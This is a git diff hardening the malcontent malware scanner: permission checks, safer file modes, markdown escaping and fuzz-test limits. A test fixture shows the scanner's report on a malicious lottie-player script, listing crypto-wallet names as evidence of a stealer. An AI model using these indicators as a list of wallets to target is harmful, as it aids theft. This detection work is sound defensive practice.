a6428117d..921f5c21e 100644 --- a/pkg/compile/compile.go +++ b/pkg/compile/compile.go @@ -252,6 +252,16 @@ func getCacheDir() (string, error) { return "", fmt.Errorf("create cache dir: %w", err) } + // Verify the cache directory has safe permissions to prevent cache poisoning + // via pre-created directories with permissive permissions + fi, err := os.Stat(cacheDir) + if err != nil { + return "", fmt.Errorf("stat cache dir: %w", err) + } + if fi.Mode().Perm()&0o077 != 0 { + return "", fmt.Errorf("cache directory %s has unsafe permissions %o (expected 0700)", cacheDir, fi.Mode().Perm()) + } + return cacheDir, nil } diff --git a/pkg/compile/fuzz_test.go b/pkg/compile/fuzz_test.go index bd8ce361a..fb1992692 100644 --- a/pkg/compile/fuzz_test.go +++ b/pkg/compile/fuzz_test.go @@ -4,6 +4,7 @@ package compile import ( + "bytes" "context" "io/fs" "regexp" @@ -131,7 +132,21 @@ func FuzzRecursiveCompile(f *testing.F) { // Non-UTF8 rule name (should be skipped) f.Add([]byte(`rule \xff\xfe { condition: true }`)) + // yara[-x] does not support floating-point literals in conditions. + // The yara-x C API aborts (exit status 2) on inputs like + // "filesize < 1.485760", which cannot be caught by recover(). + floatPattern := regexp.MustCompile(`\d+\.\d+`) + f.Fuzz(func(_ *testing.T, data []byte) { + if len(data) > 50*1024*1024 { + return + } + + // Skip inputs with float literals that crash the YARA-X C library. + if bytes.Contains(data, []byte("condition")) && floatPattern.Match(data) { + return + } + fsys := fstest.MapFS{ "test.yara": { Data: data, diff --git a/pkg/compile/testdata/fuzz/FuzzRecursiveCompile/d949c1813b98cef3 b/pkg/compile/testdata/fuzz/FuzzRecursiveCompile/d949c1813b98cef3 new file mode 100644 index 000000000..152c2b306 --- /dev/null +++ b/pkg/compile/testdata/fuzz/FuzzRecursiveCompile/d949c1813b98cef3 @@ -0,0 +1,2 @@ +go test fuzz v1 +[]byte("rule cxFreeze_Python_executable: high {\n meta:\n description = \"uses cxFreeze packer\"\n filetypes = \"py\"\n\n strings:\n $cxfreeze = \"cx_Freeze\"\n $not_importlib = \"tool like cx_Freeze\"\n\n condition:\n filesize < 1.485760 and $cxfreeze and none of ($not*)\n}\n") diff --git a/pkg/malcontent/malcontent.go b/pkg/malcontent/malcontent.go index 43f60f3af..369e19028 100644 --- a/pkg/malcontent/malcontent.go +++ b/pkg/malcontent/malcontent.go @@ -32,6 +32,7 @@ type Config struct { IgnoreTags []string IncludeDataFiles bool MaxDepth int + MaxImageSize int64 MaxScanFiles int MinFileRisk int MinRisk int diff --git a/pkg/profile/profile.go b/pkg/profile/profile.go index f8bf0ba01..fa0bae4e1 100644 --- a/pkg/profile/profile.go +++ b/pkg/profile/profile.go @@ -93,22 +93,22 @@ func StartProfiling(ctx context.Context, config *Config) (*Profiler, error) { func (p *Profiler) initializeProfiles() error { var err error - p.cpuFile, err = os.Create(filepath.Join(p.config.OutputDir, p.config.FilePrefix+"_cpu.pprof")) + p.cpuFile, err = os.OpenFile(filepath.Join(p.config.OutputDir, p.config.FilePrefix+"_cpu.pprof"), os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600) if err != nil { return fmt.Errorf("failed to create CPU profile: %w", err) } - p.memFile, err = os.Create(filepath.Join(p.config.OutputDir, p.config.FilePrefix+"_mem_final.pprof")) + p.memFile, err = os.OpenFile(filepath.Join(p.config.OutputDir, p.config.FilePrefix+"_mem_final.pprof"), os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600) if err != nil { return fmt.Errorf("failed to create memory profile: %w", err) } - p.traceFile, err = os.Create(filepath.Join(p.config.OutputDir, p.config.FilePrefix+"_trace.out")) + p.traceFile, err = os.OpenFile(filepath.Join(p.config.OutputDir, p.config.FilePrefix+"_trace.out"), os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600) if err != nil { return fmt.Errorf("failed to create trace file: %w", err) } - p.goroutFile, err = os.Create(filepath.Join(p.config.OutputDir, p.config.FilePrefix+"_goroutines.txt")) + p.goroutFile, err = os.OpenFile(filepath.Join(p.config.OutputDir, p.config.FilePrefix+"_goroutines.txt"), os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600) if err != nil { return fmt.Errorf("failed to create goroutine profile: %w", err) } @@ -123,41 +123,52 @@ func (p *Profiler) periodicHeapProfile() { for { select { case <-ticker.C: - timestamp := time.Now().UnixNano() - filename := filepath.Join(p.config.OutputDir, - fmt.Sprintf("%s_mem_%d.pprof", p.config.FilePrefix, timestamp)) - - f, err := os.Create(filename) - if err != nil { - fmt.Fprintf(os.Stderr, "failed to create heap profile: %v\n", err) - continue - } - - if err := pprof.WriteHeapProfile(f); err != nil { - fmt.Fprintf(os.Stderr, "failed to write heap profile: %v\n", err) - } - f.Close() + p.writeHeapSnapshot() case <-p.ctx.Done(): return } } } +func (p *Profiler) writeHeapSnapshot() { + timestamp := time.Now().UnixNano() + filename := filepath.Join(p.config.OutputDir, + fmt.Sprintf("%s_mem_%d.pprof", p.config.FilePrefix, timestamp)) + + f, err := os.OpenFile(filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600) + if err != nil { + fmt.Fprintf(os.Stderr, "failed to create heap profile: %v\n", err) + return + } + defer f.Close() + + if err := pprof.WriteHeapProfile(f); err != nil { + fmt.Fprintf(os.Stderr, "failed to write heap profile: %v\n", err) + } +} + func (p *Profiler) profileGoroutines() { ticker := time.NewTicker(5 * time.Second) defer ticker.Stop() + const maxStackBuf = 64 * 1024 * 1024 // 64MB + buf := make([]byte, 1<<20) + for { select { case <-ticker.C: - buf := make([]byte, 1<<20) + buf = buf[:cap(buf)] for i := 0; ; i++ { n := runtime.Stack(buf, true) if n < len(buf) { buf = buf[:n] break } - buf = make([]byte, 2*len(buf)) + if cap(buf)*2 > maxStackBuf { + buf = buf[:n] + break + } + buf = make([]byte, cap(buf)*2) } if _, err := fmt.Fprintf(p.goroutFile, "\n--- Goroutine dump at %s ---\n", time.Now().Format(time.RFC3339)); err != nil { diff --git a/pkg/programkind/fuzz_test.go b/pkg/programkind/fuzz_test.go index 23e531b0d..e92a4e602 100644 --- a/pkg/programkind/fuzz_test.go +++ b/pkg/programkind/fuzz_test.go @@ -9,10 +9,15 @@ import ( "path/filepath" "testing" "time" + + "github.com/chainguard-dev/malcontent/pkg/file" ) // FuzzFile tests file type detection with random inputs. func FuzzFile(f *testing.F) { + // Limit seed file size to avoid excessive memory usage during fuzzing. + const maxSeedSize int64 = 50 * 1024 * 1024 // 50MB + samplesDir := "../../out/chainguard-sandbox/malcontent-samples" err := filepath.WalkDir(samplesDir, func(path string, d os.DirEntry, _ error) error { if d == nil || d.IsDir() { @@ -22,8 +27,20 @@ func FuzzFile(f *testing.F) { return nil } - if data, readErr := os.ReadFile(path); readErr == nil { - f.Add(data, filepath.Base(path)) + info, infoErr := d.Info() + if infoErr != nil { + return infoErr + } + if info.Size() > maxSeedSize { + return nil + } + + if fp, readErr := os.Open(path); readErr == nil { + buf := make([]byte, file.ExtractBuffer) + if data, contentsErr := file.GetContents(fp, buf); contentsErr == nil { + f.Add(data, filepath.Base(path)) + } + fp.Close() } return nil }) @@ -47,6 +64,9 @@ func FuzzFile(f *testing.F) { f.Add([]byte("UPX!"), "test.upx") // UPX magic f.Fuzz(func(t *testing.T, data []byte, filename string) { + if len(data) > 50*1024*1024 { + return + } if len(filename) > 255 || filepath.Clean(filename) != filename { return } diff --git a/pkg/programkind/programkind.go b/pkg/programkind/programkind.go index 361626646..c8f002290 100644 --- a/pkg/programkind/programkind.go +++ b/pkg/programkind/programkind.go @@ -232,21 +232,22 @@ var ErrUPXNotFound = errors.New("UPX executable not found") const defaultUPXPath = "/usr/bin/upx" -func UPXInstalled() error { +// UPXInstalled returns the resolved path to the UPX binary, or an error if not found. +func UPXInstalled() (string, error) { upxPath := cmp.Or(os.Getenv("MALCONTENT_UPX_PATH"), defaultUPXPath) fi, err := os.Stat(upxPath) if err != nil { if errors.Is(err, fs.ErrNotExist) { - return ErrUPXNotFound + return "", ErrUPXNotFound } - return fmt.Errorf("failed to check for UPX executable: %w", err) + return "", fmt.Errorf("failed to check for UPX executable: %w", err) } if fi.Mode()&0o111 != 0o111 { - return fmt.Errorf("provided UPX binary is not executable") + return "", fmt.Errorf("provided UPX binary is not executable") } - return nil + return upxPath, nil } // IsValidUPX checks whether a suspected UPX-compressed file can be decompressed with UPX. @@ -255,7 +256,8 @@ func IsValidUPX(ctx context.Context, fc []byte, path string) (bool, error) { return false, nil } - if err := UPXInstalled(); err != nil { + upxPath, err := UPXInstalled() + if err != nil { return false, err } @@ -272,7 +274,7 @@ func IsValidUPX(ctx context.Context, fc []byte, path string) (bool, error) { return false, err } - cmd := exec.CommandContext(ctx, "upx", "-l", "-f", "--", absPath) + cmd := exec.CommandContext(ctx, upxPath, "-l", "-f", "--", absPath) output, err := cmd.CombinedOutput() if err != nil && (bytes.Contains(output, []byte("NotPackedException")) || diff --git a/pkg/refresh/action.go b/pkg/refresh/action.go index 8feec87a1..76598cf22 100644 --- a/pkg/refresh/action.go +++ b/pkg/refresh/action.go @@ -89,12 +89,14 @@ func actionRefresh(ctx context.Context) ([]TestData, error) { r, err := render.New(td.format, outFile) if err != nil { + outFile.Close() return nil, fmt.Errorf("create renderer for %s: %w", output, err) } rfs := []fs.FS{rules.FS, thirdparty.FS} yrs, err := action.CachedRules(ctx, rfs) if err != nil { + outFile.Close() return nil, err } @@ -113,6 +115,7 @@ func actionRefresh(ctx context.Context) ([]TestData, error) { testData = append(testData, TestData{ Config: c, + OutFile: outFile, OutputPath: output, }) } diff --git a/pkg/refresh/diff.go b/pkg/refresh/diff.go index ef58dfa99..b45772b76 100644 --- a/pkg/refresh/diff.go +++ b/pkg/refresh/diff.go @@ -180,6 +180,7 @@ func diffRefresh(ctx context.Context, rc Config) ([]TestData, error) { renderer, err := render.New(td.format, outFile) if err != nil { + outFile.Close() return nil, fmt.Errorf("create renderer for %s: %w", output, err) } @@ -196,6 +197,7 @@ func diffRefresh(ctx context.Context, rc Config) ([]TestData, error) { rfs := []fs.FS{rules.FS, thirdparty.FS} yrs, err := action.CachedRules(ctx, rfs) if err != nil { + outFile.Close() return nil, err } @@ -214,6 +216,7 @@ func diffRefresh(ctx context.Context, rc Config) ([]TestData, error) { testData = append(testData, TestData{ Config: c, + OutFile: outFile, OutputPath: output, }) } diff --git a/pkg/refresh/refresh.go b/pkg/refresh/refresh.go index b4f123604..9997f2e26 100644 --- a/pkg/refresh/refresh.go +++ b/pkg/refresh/refresh.go @@ -33,6 +33,7 @@ type Config struct { // TestData stores per-scan configuration and output location. type TestData struct { Config *malcontent.Config + OutFile *os.File OutputPath string } @@ -129,6 +130,7 @@ func prepareRefresh(ctx context.Context, rc Config) ([]TestData, error) { r, err := render.New(format, outFile) if err != nil { + outFile.Close() return nil, fmt.Errorf("create renderer for %s: %w", sample, err) } @@ -137,6 +139,7 @@ func prepareRefresh(ctx context.Context, rc Config) ([]TestData, error) { rfs := []fs.FS{rules.FS, thirdparty.FS} yrs, err := action.CachedRules(ctx, rfs) if err != nil { + outFile.Close() return nil, err } @@ -162,6 +165,7 @@ func prepareRefresh(ctx context.Context, rc Config) ([]TestData, error) { c.ScanPaths = diffFiles testData = append(testData, TestData{ Config: c, + OutFile: outFile, OutputPath: data, }) } @@ -169,6 +173,7 @@ func prepareRefresh(ctx context.Context, rc Config) ([]TestData, error) { c.ScanPaths = []string{sample} testData = append(testData, TestData{ Config: c, + OutFile: outFile, OutputPath: data, }) } @@ -177,9 +182,19 @@ func prepareRefresh(ctx context.Context, rc Config) ([]TestData, error) { return testData, nil } +// closeTestDataFiles closes all open output files in the test data slice. +func closeTestDataFiles(testData []TestData) { + for _, td := range testData { + if td.OutFile != nil { + td.OutFile.Close() + } + } +} + // executeRefresh reads from a populated slice of TestData. func executeRefresh(ctx context.Context, c Config, testData []TestData, logger *clog.Logger) error { if ctx.Err() != nil { + closeTestDataFiles(testData) return ctx.Err() } @@ -192,6 +207,10 @@ func executeRefresh(ctx context.Context, c Config, testData []TestData, logger * g.SetLimit(c.Concurrency) for _, data := range testData { g.Go(func() error { + if data.OutFile != nil { + defer data.OutFile.Close() + } + select { case <-refreshCtx.Done(): return refreshCtx.Err() @@ -238,7 +257,7 @@ func Refresh(ctx context.Context, rc Config, logger *clog.Logger) error { } // Check if UPX is present which is required for certain refreshes - if err := programkind.UPXInstalled(); err != nil { + if _, err := programkind.UPXInstalled(); err != nil { return fmt.Errorf("required UPX installation not found: %w", err) } if rc.SamplesPath == "" { diff --git a/pkg/refresh/refresh_test.go b/pkg/refresh/refresh_test.go index e6f76e021..09ed0cbe6 100644 --- a/pkg/refresh/refresh_test.go +++ b/pkg/refresh/refresh_test.go @@ -358,6 +358,79 @@ func TestConfigConcurrencyDefault(t *testing.T) { } } +func TestCloseTestDataFiles(t *testing.T) { + t.Parallel() + tmpDir := t.TempDir() + + // Open several files and build TestData entries + testData := make([]TestData, 0, 4) + files := make([]*os.File, 0, 3) + for i := range 3 { + f, err := os.CreateTemp(tmpDir, "close-test-*") + if err != nil { + t.Fatalf("failed to create temp file %d: %v", i, err) + } + files = append(files, f) + testData = append(testData, TestData{ + OutFile: f, + OutputPath: f.Name(), + }) + } + + // Also include a nil OutFile entry to ensure it's handled gracefully + testData = append(testData, TestData{OutputPath: "no-file"}) + + closeTestDataFiles(testData) + + // Verify all files are closed by attempting to write — should fail + for i, f := range files { + _, err := f.Write([]byte("should fail")) + if err == nil { + t.Errorf("file %d (%s) is still open after closeTestDataFiles", i, f.Name()) + } + } +} + +func TestExecuteRefreshClosesFilesOnCancel(t *testing.T) { + t.Parallel() + tmpDir := t.TempDir() + + // Create open files for TestData + testData := make([]TestData, 0, 3) + files := make([]*os.File, 0, 3) + for i := range 3 { + f, err := os.CreateTemp(tmpDir, "cancel-test-*") + if err != nil { + t.Fatalf("failed to create temp file %d: %v", i, err) + } + files = append(files, f) + testData = append(testData, TestData{ + OutFile: f, + OutputPath: f.Name(), + }) + } + + // Cancel context before calling executeRefresh + ctx, cancel := context.WithCancel(context.Background()) + cancel() + + logger := clog.FromContext(ctx) + cfg := Config{Concurrency: 1} + + err := executeRefresh(ctx, cfg, testData, logger) + if !errors.Is(err, context.Canceled) { + t.Fatalf("expected context.Canceled, got: %v", err) + } + + // Verify all files were closed by the early-return path + for i, f := range files { + _, err := f.Write([]byte("should fail")) + if err == nil { + t.Errorf("file %d (%s) is still open after cancelled executeRefresh", i, f.Name()) + } + } +} + // Helper functions func fileExists(path string) bool { diff --git a/pkg/render/fuzz_test.go b/pkg/render/fuzz_test.go index 1de09ae23..cb3877801 100644 --- a/pkg/render/fuzz_test.go +++ b/pkg/render/fuzz_test.go @@ -31,8 +31,23 @@ func FuzzRenderDifferential(f *testing.F) { f.Add(int8(0), "/very/long/"+strings.Repeat("path/", 50), "behavior", "description", false) f.Add(int8(4), "/bin/app", "critical", "Very dangerous", true) // With diff + // YAML special values that cannot round-trip as map keys due to + // YAML 1.1 merge key and implicit typing (boolean, null) semantics. + yamlIgnore := map[string]bool{ + "<<": true, "~": true, + "null": true, "Null": true, "NULL": true, + "true": true, "True": true, "TRUE": true, + "false": true, "False": true, "FALSE": true, + "yes": true, "Yes": true, "YES": true, + "no": true, "No": true, "NO": true, + "on": true, "On": true, "ON": true, + "off": true, "Off": true, "OFF": true, + "y": true, "Y": true, + "n": true, "N": true, + } + f.Fuzz(func(t *testing.T, riskLevel int8, filePath, behaviorName, behaviorDesc string, hasDiff bool) { - if filePath == "" { + if filePath == "" || yamlIgnore[filePath] { return } diff --git a/pkg/render/markdown.go b/pkg/render/markdown.go index 866820697..6d2dda686 100644 --- a/pkg/render/markdown.go +++ b/pkg/render/markdown.go @@ -36,18 +36,32 @@ func mdRisk(score int, level string) string { return fmt.Sprintf("%s %s", riskEmoji(score), level) } +// sanitizeMarkdown escapes characters that could be used for markdown injection. +func sanitizeMarkdown(s string) string { + r := strings.NewReplacer( + "[", "\\[", + "]", "\\]", + "(", "\\(", + ")", "\\)", + "`", "\\`", + ) + return r.Replace(s) +} + // generate a markdown link for a matched fragment. func matchFragmentLink(s string) string { // it's probably the name of a matched YARA field, for example, if it's xor'ed data if strings.HasPrefix(s, "$") { - return fmt.Sprintf("`%s`", s) + return fmt.Sprintf("`%s`", sanitizeMarkdown(s)) } if strings.HasPrefix(s, "https:") || strings.HasPrefix(s, "http://") { - return fmt.Sprintf("[%s](%s)", s, s) + safe := sanitizeMarkdown(s) + return fmt.Sprintf("[%s](%s)", safe, url.QueryEscape(s)) } - return fmt.Sprintf("[%s](https://github.com/search?q=%s&type=code)", s, url.QueryEscape(s)) + safe := sanitizeMarkdown(s) + return fmt.Sprintf("[%s](https://github.com/search?q=%s&type=code)", safe, url.QueryEscape(s)) } func (r Markdown) Name() string { return "Markdown" } diff --git a/pkg/report/strings.go b/pkg/report/strings.go index 0253e4c97..d5d9a68ad 100644 --- a/pkg/report/strings.go +++ b/pkg/report/strings.go @@ -4,6 +4,7 @@ package report import ( + "cmp" "slices" "sync" @@ -72,6 +73,8 @@ func (mp *matchProcessor) process() []string { return nil } + fcl := uint64(len(mp.fc)) + resultPtr, ok := matchResultPool.Get().(*[]string) if !ok || resultPtr == nil { s := make([]string, 0, len(mp.matches)) @@ -79,13 +82,11 @@ func (mp *matchProcessor) process() []string { } result := (*resultPtr)[:0] - // #nosec G115 // ignore Type conversion which leads to integer overflow for _, match := range mp.matches { l := match.Length() o := match.Offset() - // avoid any processing if the match offset and match length exceed the size of the file - if o+l > uint64(len(mp.fc)) { + if cmp.Or(o > fcl, l > fcl, o+l > fcl) { continue } diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff index f63e492d2..2bab9cdd0 100644 --- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff +++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff @@ -5,21 +5,21 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |:--|:--|:--|:--| | +CRITICAL | **[exfil/stealer/wallet](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/wallet.yara#crypto_stealer_names)** | makes HTTPS connections and references multiple wallets by name | [Coinbase_Wordmark_SubBrands_ALL](https://github.com/search?q=Coinbase_Wordmark_SubBrands_ALL&type=code)
[CoinbaseInjectedProvider](https://github.com/search?q=CoinbaseInjectedProvider&type=code)
[CoinbaseInjectedSigner](https://github.com/search?q=CoinbaseInjectedSigner&type=code)
[CoinbaseWalletDeeplink](https://github.com/search?q=CoinbaseWalletDeeplink&type=code)
[CoinbaseWalletProvider](https://github.com/search?q=CoinbaseWalletProvider&type=code)
[CoinbaseTransactions](https://github.com/search?q=CoinbaseTransactions&type=code)
[CoinbaseWalletRound](https://github.com/search?q=CoinbaseWalletRound&type=code)
[CoinbaseWalletSteps](https://github.com/search?q=CoinbaseWalletSteps&type=code)
[CoinbaseWalletLogo](https://github.com/search?q=CoinbaseWalletLogo&type=code)
[CoinbaseConnector](https://github.com/search?q=CoinbaseConnector&type=code)
[CoinbaseOnRampURL](https://github.com/search?q=CoinbaseOnRampURL&type=code)
[CoinbaseWalletSDK](https://github.com/search?q=CoinbaseWalletSDK&type=code)
[CoinbaseBrowser](https://github.com/search?q=CoinbaseBrowser&type=code)
[BraveWallet](https://github.com/search?q=BraveWallet&type=code)
[Ronin](https://github.com/search?q=Ronin&type=code)
[http](https://github.com/search?q=http&type=code) | -| +HIGH | **[anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#unsigned_bitwise_math_excess)** | [uses an excessive amount of unsigned bitwise math](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [function(](https://github.com/search?q=function%28&type=code)
[charAt(a](https://github.com/search?q=charAt%28a&type=code)
[charAt(c](https://github.com/search?q=charAt%28c&type=code)
[charAt(n](https://github.com/search?q=charAt%28n&type=code)
[charAt(s](https://github.com/search?q=charAt%28s&type=code)
[charAt(t](https://github.com/search?q=charAt%28t&type=code)
[charAt(u](https://github.com/search?q=charAt%28u&type=code)
[charAt(w](https://github.com/search?q=charAt%28w&type=code)
[a>>>11](https://github.com/search?q=a%3E%3E%3E11&type=code)
[a>>>13](https://github.com/search?q=a%3E%3E%3E13&type=code)
[a>>>15](https://github.com/search?q=a%3E%3E%3E15&type=code)
[a>>>16](https://github.com/search?q=a%3E%3E%3E16&type=code)
[a>>>22](https://github.com/search?q=a%3E%3E%3E22&type=code)
[a>>>24](https://github.com/search?q=a%3E%3E%3E24&type=code)
[a>>>25](https://github.com/search?q=a%3E%3E%3E25&type=code)
[a>>>26](https://github.com/search?q=a%3E%3E%3E26&type=code)
[a>>>31](https://github.com/search?q=a%3E%3E%3E31&type=code)
[a>>>32](https://github.com/search?q=a%3E%3E%3E32&type=code)
[b>>>29](https://github.com/search?q=b%3E%3E%3E29&type=code)
[b>>>31](https://github.com/search?q=b%3E%3E%3E31&type=code)
[c>>>16](https://github.com/search?q=c%3E%3E%3E16&type=code)
[c>>>24](https://github.com/search?q=c%3E%3E%3E24&type=code)
[c>>>31](https://github.com/search?q=c%3E%3E%3E31&type=code)
[d>>>16](https://github.com/search?q=d%3E%3E%3E16&type=code)
[d>>>24](https://github.com/search?q=d%3E%3E%3E24&type=code)
[d>>>26](https://github.com/search?q=d%3E%3E%3E26&type=code)
[d>>>29](https://github.com/search?q=d%3E%3E%3E29&type=code)
[d>>>31](https://github.com/search?q=d%3E%3E%3E31&type=code)
[e>>>10](https://github.com/search?q=e%3E%3E%3E10&type=code)
[e>>>11](https://github.com/search?q=e%3E%3E%3E11&type=code)
[e>>>12](https://github.com/search?q=e%3E%3E%3E12&type=code)
[e>>>13](https://github.com/search?q=e%3E%3E%3E13&type=code)
[e>>>14](https://github.com/search?q=e%3E%3E%3E14&type=code)
[e>>>16](https://github.com/search?q=e%3E%3E%3E16&type=code)
[e>>>17](https://github.com/search?q=e%3E%3E%3E17&type=code)
[e>>>18](https://github.com/search?q=e%3E%3E%3E18&type=code)
[e>>>19](https://github.com/search?q=e%3E%3E%3E19&type=code)
[e>>>22](https://github.com/search?q=e%3E%3E%3E22&type=code)
[e>>>24](https://github.com/search?q=e%3E%3E%3E24&type=code)
[e>>>25](https://github.com/search?q=e%3E%3E%3E25&type=code)
[e>>>26](https://github.com/search?q=e%3E%3E%3E26&type=code)
[e>>>27](https://github.com/search?q=e%3E%3E%3E27&type=code)
[e>>>28](https://github.com/search?q=e%3E%3E%3E28&type=code)
[e>>>29](https://github.com/search?q=e%3E%3E%3E29&type=code)
[e>>>31](https://github.com/search?q=e%3E%3E%3E31&type=code)
[e>>>32](https://github.com/search?q=e%3E%3E%3E32&type=code)
[e>>>64](https://github.com/search?q=e%3E%3E%3E64&type=code)
[f>>>13](https://github.com/search?q=f%3E%3E%3E13&type=code)
[f>>>24](https://github.com/search?q=f%3E%3E%3E24&type=code)
[f>>>31](https://github.com/search?q=f%3E%3E%3E31&type=code)
[g>>>16](https://github.com/search?q=g%3E%3E%3E16&type=code)
[h>>>11](https://github.com/search?q=h%3E%3E%3E11&type=code)
[h>>>16](https://github.com/search?q=h%3E%3E%3E16&type=code)
[h>>>19](https://github.com/search?q=h%3E%3E%3E19&type=code)
[h>>>24](https://github.com/search?q=h%3E%3E%3E24&type=code)
[h>>>25](https://github.com/search?q=h%3E%3E%3E25&type=code)
[h>>>29](https://github.com/search?q=h%3E%3E%3E29&type=code)
[h>>>31](https://github.com/search?q=h%3E%3E%3E31&type=code)
[i>>>10](https://github.com/search?q=i%3E%3E%3E10&type=code)
[i>>>13](https://github.com/search?q=i%3E%3E%3E13&type=code)
[i>>>16](https://github.com/search?q=i%3E%3E%3E16&type=code)
[i>>>22](https://github.com/search?q=i%3E%3E%3E22&type=code)
[i>>>27](https://github.com/search?q=i%3E%3E%3E27&type=code)
[i>>>31](https://github.com/search?q=i%3E%3E%3E31&type=code)
[j>>>21](https://github.com/search?q=j%3E%3E%3E21&type=code)
[k>>>20](https://github.com/search?q=k%3E%3E%3E20&type=code)
[l>>>26](https://github.com/search?q=l%3E%3E%3E26&type=code)
[l>>>31](https://github.com/search?q=l%3E%3E%3E31&type=code)
[m>>>10](https://github.com/search?q=m%3E%3E%3E10&type=code)
[m>>>13](https://github.com/search?q=m%3E%3E%3E13&type=code)
[m>>>17](https://github.com/search?q=m%3E%3E%3E17&type=code)
[m>>>19](https://github.com/search?q=m%3E%3E%3E19&type=code)
[n>>>13](https://github.com/search?q=n%3E%3E%3E13&type=code)
[n>>>16](https://github.com/search?q=n%3E%3E%3E16&type=code)
[n>>>17](https://github.com/search?q=n%3E%3E%3E17&type=code)
[n>>>24](https://github.com/search?q=n%3E%3E%3E24&type=code)
[n>>>26](https://github.com/search?q=n%3E%3E%3E26&type=code)
[n>>>31](https://github.com/search?q=n%3E%3E%3E31&type=code)
[o>>>10](https://github.com/search?q=o%3E%3E%3E10&type=code)
[o>>>16](https://github.com/search?q=o%3E%3E%3E16&type=code)
[o>>>22](https://github.com/search?q=o%3E%3E%3E22&type=code)
[o>>>24](https://github.com/search?q=o%3E%3E%3E24&type=code)
[o>>>31](https://github.com/search?q=o%3E%3E%3E31&type=code)
[p>>>18](https://github.com/search?q=p%3E%3E%3E18&type=code)
[p>>>31](https://github.com/search?q=p%3E%3E%3E31&type=code)
[r>>>10](https://github.com/search?q=r%3E%3E%3E10&type=code)
[r>>>13](https://github.com/search?q=r%3E%3E%3E13&type=code)
[r>>>24](https://github.com/search?q=r%3E%3E%3E24&type=code)
[s>>>14](https://github.com/search?q=s%3E%3E%3E14&type=code)
[s>>>24](https://github.com/search?q=s%3E%3E%3E24&type=code)
[s>>>26](https://github.com/search?q=s%3E%3E%3E26&type=code)
[s>>>31](https://github.com/search?q=s%3E%3E%3E31&type=code)
[t>>>16](https://github.com/search?q=t%3E%3E%3E16&type=code)
[t>>>26](https://github.com/search?q=t%3E%3E%3E26&type=code)
[t>>>29](https://github.com/search?q=t%3E%3E%3E29&type=code)
[t>>>32](https://github.com/search?q=t%3E%3E%3E32&type=code)
[t>>>64](https://github.com/search?q=t%3E%3E%3E64&type=code)
[u>>>13](https://github.com/search?q=u%3E%3E%3E13&type=code)
[u>>>16](https://github.com/search?q=u%3E%3E%3E16&type=code)
[u>>>24](https://github.com/search?q=u%3E%3E%3E24&type=code)
[u>>>31](https://github.com/search?q=u%3E%3E%3E31&type=code)
[v>>>16](https://github.com/search?q=v%3E%3E%3E16&type=code)
[v>>>24](https://github.com/search?q=v%3E%3E%3E24&type=code)
[v>>>28](https://github.com/search?q=v%3E%3E%3E28&type=code)
[w>>>10](https://github.com/search?q=w%3E%3E%3E10&type=code)
[w>>>17](https://github.com/search?q=w%3E%3E%3E17&type=code)
[w>>>18](https://github.com/search?q=w%3E%3E%3E18&type=code)
[w>>>19](https://github.com/search?q=w%3E%3E%3E19&type=code)
[w>>>28](https://github.com/search?q=w%3E%3E%3E28&type=code)
[x>>>14](https://github.com/search?q=x%3E%3E%3E14&type=code)
[x>>>18](https://github.com/search?q=x%3E%3E%3E18&type=code)
[x>>>23](https://github.com/search?q=x%3E%3E%3E23&type=code)
[y>>>13](https://github.com/search?q=y%3E%3E%3E13&type=code)
[y>>>29](https://github.com/search?q=y%3E%3E%3E29&type=code)
[y>>>31](https://github.com/search?q=y%3E%3E%3E31&type=code)
[z>>>17](https://github.com/search?q=z%3E%3E%3E17&type=code)
[a>>>0](https://github.com/search?q=a%3E%3E%3E0&type=code)
[a>>>6](https://github.com/search?q=a%3E%3E%3E6&type=code)
[a>>>8](https://github.com/search?q=a%3E%3E%3E8&type=code)
[b>>>0](https://github.com/search?q=b%3E%3E%3E0&type=code)
[c>>>0](https://github.com/search?q=c%3E%3E%3E0&type=code)
[c>>>5](https://github.com/search?q=c%3E%3E%3E5&type=code)
[c>>>8](https://github.com/search?q=c%3E%3E%3E8&type=code)
[d>>>6](https://github.com/search?q=d%3E%3E%3E6&type=code)
[d>>>7](https://github.com/search?q=d%3E%3E%3E7&type=code)
[d>>>8](https://github.com/search?q=d%3E%3E%3E8&type=code)
[e>>>0](https://github.com/search?q=e%3E%3E%3E0&type=code)
[e>>>4](https://github.com/search?q=e%3E%3E%3E4&type=code)
[e>>>5](https://github.com/search?q=e%3E%3E%3E5&type=code)
[e>>>7](https://github.com/search?q=e%3E%3E%3E7&type=code)
[e>>>8](https://github.com/search?q=e%3E%3E%3E8&type=code)
[f>>>8](https://github.com/search?q=f%3E%3E%3E8&type=code)
[h>>>6](https://github.com/search?q=h%3E%3E%3E6&type=code)
[h>>>7](https://github.com/search?q=h%3E%3E%3E7&type=code)
[h>>>8](https://github.com/search?q=h%3E%3E%3E8&type=code)
[i>>>0](https://github.com/search?q=i%3E%3E%3E0&type=code)
[i>>>5](https://github.com/search?q=i%3E%3E%3E5&type=code)
[k>>>4](https://github.com/search?q=k%3E%3E%3E4&type=code)
[l>>>0](https://github.com/search?q=l%3E%3E%3E0&type=code)
[l>>>8](https://github.com/search?q=l%3E%3E%3E8&type=code)
[m>>>0](https://github.com/search?q=m%3E%3E%3E0&type=code)
[n>>>0](https://github.com/search?q=n%3E%3E%3E0&type=code)
[n>>>5](https://github.com/search?q=n%3E%3E%3E5&type=code)
[n>>>7](https://github.com/search?q=n%3E%3E%3E7&type=code)
[n>>>8](https://github.com/search?q=n%3E%3E%3E8&type=code)
[o>>>0](https://github.com/search?q=o%3E%3E%3E0&type=code)
[o>>>4](https://github.com/search?q=o%3E%3E%3E4&type=code)
[o>>>5](https://github.com/search?q=o%3E%3E%3E5&type=code)
[o>>>8](https://github.com/search?q=o%3E%3E%3E8&type=code)
